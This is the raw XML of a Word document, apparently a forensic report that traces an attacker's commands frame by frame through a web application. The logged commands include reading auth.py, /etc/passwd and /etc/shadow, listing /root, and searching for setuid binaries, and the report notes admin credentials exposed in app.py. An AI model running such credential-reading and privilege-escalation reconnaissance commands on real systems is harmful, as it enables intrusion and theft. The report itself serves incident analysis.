      <w:r w:rsidR="1C803438" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>result of such command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0187BA97" w14:textId="54062A77" w:rsidR="1C803438" w:rsidRDefault="1C803438" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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The file app.py </w:t>
      </w:r>
      <w:r w:rsidR="0ECE6D60" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">has the credentials for </w:t>
      </w:r>
      <w:r w:rsidR="0C1837C3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0ECE6D60" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user “admin” completely expose</w:t>
      </w:r>
      <w:r w:rsidR="6E20DFF8" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">d, which means that, at this moment, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="20EBCE9B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>can login to the website with those</w:t>
      </w:r>
      <w:r w:rsidR="6B6AAA5B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> same</w:t>
      </w:r>
      <w:r w:rsidR="20EBCE9B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials</w:t>
      </w:r>
      <w:r w:rsidR="29FE91E0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3045F605" w14:textId="5054BBC4" w:rsidR="29FE91E0" w:rsidRDefault="29FE91E0" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CWE-522: Insufficiently Protected Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282F798E" w14:textId="3CCB08C3" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA86757" w14:textId="575ED989" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D3AD91" w14:textId="1B4C4690" w:rsidR="71D140BF" w:rsidRDefault="71D140BF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7308 – 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB6F19E" w14:textId="27F3C9B1" w:rsidR="1023B702" w:rsidRDefault="1023B702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 xml:space="preserve">Sends command “cat auth.py” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and receives the result of such command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDDEAB" w14:textId="5207B464" w:rsidR="1023B702" w:rsidRDefault="1023B702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7321 – 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAB9AB7" w14:textId="554575DC" w:rsidR="1023B702" w:rsidRDefault="1023B702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“cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/passwd” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and receives the result of such command</w:t>
      </w:r>
      <w:r w:rsidR="440990E2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27555A26" w14:textId="5F43450A" w:rsidR="7612C1B8" w:rsidRDefault="7612C1B8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Gets some information about system users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FE834" w14:textId="28B34394" w:rsidR="1023B702" w:rsidRDefault="1023B702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73</w:t>
      </w:r>
      <w:r w:rsidR="327E7311" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:18 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA53266" w14:textId="3A4ED09D" w:rsidR="1023B702" w:rsidRDefault="1023B702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 xml:space="preserve">Sends command “cat </w:t>
      </w:r>
      <w:r w:rsidR="08C252C3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="08C252C3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="08C252C3" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/shadow</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and receives the result of such command</w:t>
      </w:r>
      <w:r w:rsidR="3BEDF8C7" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747481B9" w14:textId="46BADF75" w:rsidR="63891C80" w:rsidRDefault="63891C80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Gets </w:t>
      </w:r>
      <w:r w:rsidR="239A36CF" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>infor</w:t>
      </w:r>
      <w:r w:rsidR="11484734" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mation about system users’ passwords (</w:t>
      </w:r>
      <w:r w:rsidR="6200E8AC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">which is, in this case, that </w:t>
      </w:r>
      <w:r w:rsidR="11484734" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>none of th</w:t>
      </w:r>
      <w:r w:rsidR="0F7BA2DC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e users</w:t>
      </w:r>
      <w:r w:rsidR="11484734" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> have password</w:t>
      </w:r>
      <w:r w:rsidR="42548F2B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s defined</w:t>
      </w:r>
      <w:r w:rsidR="11484734" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF09286" w14:textId="17CF33BC" w:rsidR="1023B702" w:rsidRDefault="1023B702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73</w:t>
      </w:r>
      <w:r w:rsidR="03A8A13E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="4E20880D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:1</w:t>
      </w:r>
      <w:r w:rsidR="039D74AC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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107FDEA7" w14:textId="1B4D4CFA" w:rsidR="1023B702" w:rsidRDefault="1023B702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 xml:space="preserve">Sends command “cat </w:t>
      </w:r>
      <w:r w:rsidR="4057948E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/proc/mount</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="5F4AB30F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>but receives no</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB093B" w14:textId="129780A2" w:rsidR="1023B702" w:rsidRDefault="1023B702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73</w:t>
      </w:r>
      <w:r w:rsidR="67B2DD76" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:1</w:t>
      </w:r>
      <w:r w:rsidR="309F294B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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76DB31EE" w14:textId="361F1F95" w:rsidR="1023B702" w:rsidRDefault="1023B702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r w:rsidR="1DEF9841" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="1DEF9841" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and receives the result of such command</w:t>
      </w:r>
      <w:r w:rsidR="03C6DA5B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E579EA" w14:textId="2B6F3C85" w:rsidR="7AC5943B" w:rsidRDefault="7AC5943B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 xml:space="preserve">Frame </w:t>
      </w:r>
      <w:r w:rsidR="62FB13D6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8060</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:1</w:t>
      </w:r>
      <w:r w:rsidR="2A35BE6E" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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2F03CD22" w14:textId="1EA0FD7E" w:rsidR="7AC5943B" w:rsidRDefault="7AC5943B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proofErr w:type="gramStart"/>
      <w:r w:rsidR="1C4D025C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>touch .a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="424D866F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it succeeds to create “.a”</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7801C11B" w14:textId="12948650" w:rsidR="6CB89F65" w:rsidRDefault="6CB89F65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8070 – 19:19 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697525EE" w14:textId="19976601" w:rsidR="19EA6540" w:rsidRDefault="19EA6540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“ls -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>la .a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and confirms that “.a” was created from last command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29143323" w14:textId="01FF847B" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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8080 – 19:19 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335C9AE2" w14:textId="500888AD" w:rsidR="0EEEFD91" w:rsidRDefault="0EEEFD91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“ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/.a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and gets no result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62056CCF" w14:textId="47F0EBAF" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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80</w:t>
      </w:r>
      <w:r w:rsidR="67E9F8C0" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0 – 19:</w:t>
      </w:r>
      <w:r w:rsidR="46D31F94" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20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7AB56527" w14:textId="120886BD" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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 xml:space="preserve">Sends command “ls -la </w:t>
      </w:r>
      <w:r w:rsidR="3996BEC1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/root/</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="3FFD5525" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>receives the result of such</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57882073" w14:textId="41D3B7D4" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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</w:t>
      </w:r>
      <w:r w:rsidR="4663EB89" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>00 – 19:</w:t>
      </w:r>
      <w:r w:rsidR="13C56D0F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20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29AA30E6" w14:textId="6FFC8666" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sends command “ls </w:t>
      </w:r>
      <w:r w:rsidR="2CC44BAA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/home/</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="51ABB249" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nd gets no result</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77E121" w14:textId="08F1AEE4" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr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</w:t>
      </w:r>
      <w:r w:rsidR="396F7D57" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>110</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:</w:t>
      </w:r>
      <w:r w:rsidR="0FB6D696" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">20 </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29579349" w14:textId="2DB4A8CB" w:rsidR="3F56533F" w:rsidRDefault="3F56533F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“find / -perm –</w:t>
      </w:r>
      <w:r w:rsidR="5061F4DE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4000” and</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> receives the result </w:t>
      </w:r>
      <w:r w:rsidR="1D4AC9B4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> such command</w:t>
      </w:r>
      <w:r w:rsidR="10318548" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54033499" w14:textId="15D793F1" w:rsidR="10318548" w:rsidRDefault="10318548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 xml:space="preserve">Lists </w:t>
      </w:r>
      <w:r w:rsidR="74BA115F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">files with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="74BA115F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="74BA115F" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> permission</w:t>
      </w:r>
      <w:r w:rsidR="17EACED1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBFEA47" w14:textId="45EEB772" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FBD30C" w14:textId="0E3CA8A3" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A4CEE3" w14:textId="02E67A09" w:rsidR="1CFC18E9" w:rsidRDefault="1CFC18E9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</w:t>
      </w:r>
      <w:r w:rsidR="492E2040" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 19:</w:t>
      </w:r>
      <w:r w:rsidR="5C721844" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
